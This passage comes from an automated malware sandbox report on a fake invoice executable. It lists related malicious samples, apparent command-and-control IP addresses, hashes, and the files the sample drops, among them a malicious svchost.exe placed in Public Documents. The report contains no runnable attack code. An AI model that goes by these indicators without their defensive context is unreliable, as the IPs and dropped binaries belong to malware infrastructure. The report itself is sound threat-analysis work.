                                                                                                                    Codes.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.104
                                                                                                                    CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.160.233
                                                                                                                    3yevr0iqCW.exeGet hashmaliciousBrowse
                                                                                                                    • 45.148.16.42
                                                                                                                    CN-Invoice-XXXXX9808-19011143287989 (2).exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.160.233
                                                                                                                    Statement.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.162.107
                                                                                                                    Order_List_PO# 081929.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    order-1812896543124646450.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    Doc#6620200947535257653.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.160.233
                                                                                                                    DHL_10177_R29_DOCUMENT.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.160.233
                                                                                                                    order-181289654312464649.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    order-181289654312464648.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    Doc#6620200947535257653.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.160.233
                                                                                                                    Scan_order.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.61

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exePurchaseOrdersCSTtyres004786587.exeGet hashmaliciousBrowse
                                                                                                                      3zKVfxhs18.exeGet hashmaliciousBrowse
                                                                                                                        AWB783079370872.docmGet hashmaliciousBrowse
                                                                                                                          DETALLE DE TRANSFERENCIA BANCO AGRARO DE COLOMBIA.exeGet hashmaliciousBrowse
                                                                                                                            CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                                                                                              Payment Advice 170221.exeGet hashmaliciousBrowse
                                                                                                                                Payment Receipt.jarGet hashmaliciousBrowse
                                                                                                                                  miner.exeGet hashmaliciousBrowse
                                                                                                                                    875666665.xlsm.xlsmGet hashmaliciousBrowse
                                                                                                                                      DOCX.doc.docGet hashmaliciousBrowse
                                                                                                                                        v.exeGet hashmaliciousBrowse
                                                                                                                                          uaa.exeGet hashmaliciousBrowse
                                                                                                                                            r.exeGet hashmaliciousBrowse
                                                                                                                                              j.exeGet hashmaliciousBrowse
                                                                                                                                                99.exeGet hashmaliciousBrowse
                                                                                                                                                  m.exeGet hashmaliciousBrowse
                                                                                                                                                    n.exeGet hashmaliciousBrowse
                                                                                                                                                      DdV1LG7bLJ.exeGet hashmaliciousBrowse
                                                                                                                                                        TBN HMX SPECS.xlsmGet hashmaliciousBrowse
                                                                                                                                                          VESSEL CONTACT DETAILS, LOAD & DISPORT.docGet hashmaliciousBrowse

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4096
                                                                                                                                                            Entropy (8bit):0.5975851327512959
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:0Fnxllek1GaD0JOCEfMuaaD0JOCEfMKQmDYfutAl/gz2cE0fMbhEZolrRSQ2hyYp:09jTGaD0JcaaD0JwQQYmtAg/0bjSQJ
                                                                                                                                                            MD5:1690D60C794A050032229706F1A3D10C
                                                                                                                                                            SHA1:EAFE954522B89C5F2013F133693158530A1465E3
                                                                                                                                                            SHA-256:0480DEAE9119A63BF1DFE20F5AC6AB01614931B09DCE216F467AEA2A764221E5
                                                                                                                                                            SHA-512:B205889F1A3A87FEA1A82D470E98C6D3663FD75B7A72CD0D766D6E5A0A3B9C887518D37FCF7409942E992098E88030688C1EBC3C1A601ABFAD93EF3A0E425053
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ......:{..(......-...y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................-...y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x95d40a86, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):32768
                                                                                                                                                            Entropy (8bit):0.09625771879899726
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:E80+pzaXO4blCV5djUKi80+pzaXO4blCV5djUK:EzgzJVnGzgzJVn
                                                                                                                                                            MD5:11F32E8BB44083F2E25D79D4B77F5775
                                                                                                                                                            SHA1:679040ABDEB9267694340CFBDEE198D2EAC61CFF
                                                                                                                                                            SHA-256:7A24D6D879D9DA31CF7F786EE7CDE5257FD70675635C0E612DC02CFCE8A60597
                                                                                                                                                            SHA-512:29342B8CD2572C09AC195ED53807467A4A48F8BEC93A68D511B72E215D827D316A95084EA244559BCAD49D54B1873D740D1A0BC5B45B23D298C024F8E0B3A17F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ....... ................e.f.3...w........................&..........w...-...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................|.tO.-...y.....................-...y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.11144509983272985
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:gbD1Ev+IIncAr+/t7l/bJdAtiYzxrlll/all:gvQ+IIncAE7t4XdxllG
                                                                                                                                                            MD5:7E1E0C5D8E42457E1EBC55063ABF8900
                                                                                                                                                            SHA1:A1BE2EEC29393988E3B133A3DBEB295054F79FA9
                                                                                                                                                            SHA-256:64C599627275B5A37638535EBAD05F233DC37FB8968F41EE51E7847B65D2C161
                                                                                                                                                            SHA-512:5452EE93D52038458CCCEBB5FC18C80AB74C9E302176C567960F190E6B6A4891A9CE2C1E5A243F80142C858B72D7629489FA91613320ABA0BA7CB76B736E205F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ..U.....................................3...w...-...y.......w...............w.......w....:O.....w.....................-...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_SSCPUVYAPWRJCSOY_5d6ccfe7d5a2138396f817535b246bb9955b2a_e573b765_184c8058\Report.wer
                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16876
                                                                                                                                                            Entropy (8bit):3.779361989604296
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:OsjnytBUZMX+D5aqqp/u7saX4ItxM56/p:OsjoBUiOD5a5/u7saX4ItxMI
                                                                                                                                                            MD5:CD427CF331607D16676E0BBA2C15AB25
                                                                                                                                                            SHA1:A69698C0647828D3F29C3BF0E1A69325A6032147
                                                                                                                                                            SHA-256:1D36AC5EB47906A04E679CFB19B0B344F5FD2F89B58E25B630D64D2B8A927607
                                                                                                                                                            SHA-512:603048432F19D4250D88136015E6C578154CE2EB76CC58D96659B613DAD7B0875DDA78CC622B780129181C99F84214AC20A5786C05627F65AC23988D3DA758CF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.4.8.2.3.5.7.4.7.8.2.2.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.4.8.2.3.9.8.3.8.4.4.2.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.c.7.a.4.f.4.-.f.3.c.c.-.4.e.7.c.-.8.b.4.f.-.a.7.c.7.0.8.f.4.8.d.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.6.4.0.1.a.2.3.-.b.b.9.1.-.4.7.7.f.-.b.5.7.a.-.b.7.9.f.6.e.2.6.1.d.e.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.N.-.I.n.v.o.i.c.e.-.X.X.X.X.X.9.8.0.8.-.1.9.0.1.1.1.4.3.2.8.7.9.9.0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.e.4.-.0.0.0.1.-.0.0.1.6.-.6.0.8.1.-.b.2.b.3.3.1.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.9.0.0.6.5.1.0.7.f.9.d.a.3.a.6.2.4.c.4.0.a.8.0.e.f.9.f.4.0.a.0.0.0.0.0.0.9.0.4.!.0.0.0.0.e.4.6.3.d.2.1.9.a.1.d.4.d.b.d.e.3.7.5.e.4.f.5.3.c.2.f.c.2.5.0.d.6.e.e.9.d.7.f.
                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER106A.tmp.xml
                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4799
                                                                                                                                                            Entropy (8bit):4.566271468639747
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:cvIwSD8zsgJgtWI9e2hWSC8Bt8fm8M4JpFFD+q8v6zt48crrTd:uITfm1xSNMJtKeFcrrTd
                                                                                                                                                            MD5:844AFF7D37235E2E8A445576524EC9F4
                                                                                                                                                            SHA1:0A71850305BAD95DE090F2BDD4D46A28C591FA5F
                                                                                                                                                            SHA-256:40DC55BF1021ED79EAA2CCAC7A5CA58A0735F672C6F0CB548E4C2C96AC335FE8
                                                                                                                                                            SHA-512:059C142096C91317E884C2C60CEBF49626E3C9474F6282B08A6E781A3958123583B24093C8EB326734A45261A5952653D8FB5C5A7D32C95F1178274E046ECEF0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="872696" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER10B6.tmp.csv
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):57152
                                                                                                                                                            Entropy (8bit):3.0488481526810443
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:I1H67I6HF/5tvVeydWwZGPkdmCwipfHF07wD5gptHXUhSwdmOOvRGIDN:I1H67I6HF/5tvVeydWwZGPkdmCwipfHa
                                                                                                                                                            MD5:E6CEA42F3E86569C087C3FD9A64DB6F8
                                                                                                                                                            SHA1:931951637B6762AF983BBE7E6B984783DD7EA708
                                                                                                                                                            SHA-256:4352EEFF578A4C6ED5928FF6517B00A591DF5C745175C55C3C0289DCFD27CCA8
                                                                                                                                                            SHA-512:53768AEE5FA8437B604A7DE90B80DF0540AAAE022331E185F01AE351AD487CF86538E3D04297868CD21BB4DDC81C074D8CB56B7C21C6397AD04B5A4A1D8516E8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A7B.tmp.txt
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13340
                                                                                                                                                            Entropy (8bit):2.7049251281701188
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:9GiZYWWlUYhgEY+Y5pSHHYEZnFtBi6PieOwIKrDLaaBqbUDIKfx:9jZDW5pxwsLaaBqbUMKfx
                                                                                                                                                            MD5:5D5A2FC0D482AB859C851032AC5D4BB8
                                                                                                                                                            SHA1:29F9DCED712DAF860402A3344DBEF3F8654DE99A
                                                                                                                                                            SHA-256:1D5EC13567946C00907FE758055498792FA807379DA8FDCA62074CB8E19DD03B
                                                                                                                                                            SHA-512:3B3537E4BD6C4397F6395A3798D496C72AB506EB144AA8051681797657DA05784CC4A11BD65201D47BC86D1DE7674738EEF934DC41E01B723A9820F844215E04
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER741.tmp.WERInternalMetadata.xml
                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8492
                                                                                                                                                            Entropy (8bit):3.710954846877531
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:Rrl7r3GLNiR+aM6IY6YIeSUAeINgmfZndSb/CprQ89b1nOsfOnm:RrlsNiYp636YRSUAeINgmfjSba1nNfv
                                                                                                                                                            MD5:FF5873664FCD5B316EA3CA1C89FE5C49
                                                                                                                                                            SHA1:C8E4B9AA8BAAEF9A7BE6E3A00B027CE85150F2F6
                                                                                                                                                            SHA-256:8634C6310F94852DFA26090A153D044FDE16B77BAF43CBEEBB900C9AB1F01B27
                                                                                                                                                            SHA-512:746D5D73C7C22F27FC6EF5AF2671880E15703C53F600BCE460ED3C4D5BE5FB45D2F648FCA96E237B78CB84E7AEB4F8EA32FD5D371C73E89DB910D31F8F358921
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.0.4.<./.P.i.d.>.......
                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERCCD7.tmp.dmp
                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Mon Feb 22 15:46:09 2021, 0x1205a4 type
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):308516
                                                                                                                                                            Entropy (8bit):3.732502521290974
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:vuWx02jd+pOVhes9gIOgF50FNZi50yU8wUCgUEkgyrWeu/iAeobjkxaU:L0jpe9RpD6Di5l+TjdrWQaj/U
                                                                                                                                                            MD5:DE308525DA996CED860E957C437A02B3
                                                                                                                                                            SHA1:80B40D9956E42E6B5E6817ADAE96CE88904E86C7
                                                                                                                                                            SHA-256:752A5D657439A5670750DE13A982712653D4882DEFC4FE281522AB5902D15EE4
                                                                                                                                                            SHA-512:7C6D1AAD6DE31E563708B67011CCDAB39CED3F0FB027C28E1EFBCEBE1323013996455FD8952CD02658F856FA7DD88D48288C0080909DDB253D2EE14B35146055
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: MDMP....... .........3`...................U...........B......d-......GenuineIntelW...........T.............3`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                            C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
                                                                                                                                                            Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):206848
                                                                                                                                                            Entropy (8bit):5.522318927512162
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:OQEpTCImp9zO6/XSTwtPo55rKrFUcDOC53bzf01l:OQJta6/XQIFNMl
                                                                                                                                                            MD5:A656F522F604872E02DAEE9DBC458D9C
                                                                                                                                                            SHA1:E463D219A1D4DBDE375E4F53C2FC250D6EE9D7F1
                                                                                                                                                            SHA-256:A0EBCB3078763EB8ACCA534831EF9CA1A213347328698AA3CDA7C5BD23CD81D8
                                                                                                                                                            SHA-512:6D13F052BC55D278B3D6A2B0DDD286572D9E45E96FBB8F52F64847B5C93B4E7C21EDCBD2E42CCD096A660C86E1BAFEC84DD45C41195FA0C3533AE1BD1E82D9CA
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..n............... ........@.. ..............................4.....@....................................W....................v.......`....................................................... ............... ..H............text...$l... ...n.................. ..`.rsrc................p..............@..@.reloc.......`.......&..............@..B........................H.......8<...O...........................................................*".(.....*~s.........s.........s.........*B.(.......(.....*.0...........r...p....r...p....s........+...&.......(...+o/.......88.......(0...........(1.......(.................(2...o'...&.....(3...........:...................o).........o4.......8........*........$.j........0...........r...p....r...p....s........+...'.......(...+o/.......88.......(0...........(1.......(.................(2...o'...&.....(3...
                                                                                                                                                            C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe:Zone.Identifier
                                                                                                                                                            Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):26
                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14734
                                                                                                                                                            Entropy (8bit):4.993014478972177
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                                                                                            MD5:8D5E194411E038C060288366D6766D3D
                                                                                                                                                            SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                                                                                            SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                                                                                            SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):22260
                                                                                                                                                            Entropy (8bit):5.601283657543269
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:qtCDLC0LZiSouJ0UCiJ3ISBKnOul6o827Y9glSJUeR61BMrmYZSRV7kb6BDc264c:xMSog7Y4KOulP8ilXextAQb6pc
                                                                                                                                                            MD5:90158536358DDD647ED0BB31C903AFBB
                                                                                                                                                            SHA1:E8BDE2F6DB92DAC14E9AF7F408800D0089F4B8A5
                                                                                                                                                            SHA-256:A17A093DA8B5074DA5F3A77C9092F799D78DB31218A2125BA88E36F537D9B838
                                                                                                                                                            SHA-512:A3C2DA2F645A1AB4C1F004A900CF89C6F1366018433D0EB89B465F0363E548DD466353049C233329A66937DCBBB6BCD37A89C612AD968C1EB460784E9EA2EF86
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: @...e...........v...........P.B.'.....~.:............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe
                                                                                                                                                            Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):91000
                                                                                                                                                            Entropy (8bit):6.241345766746317
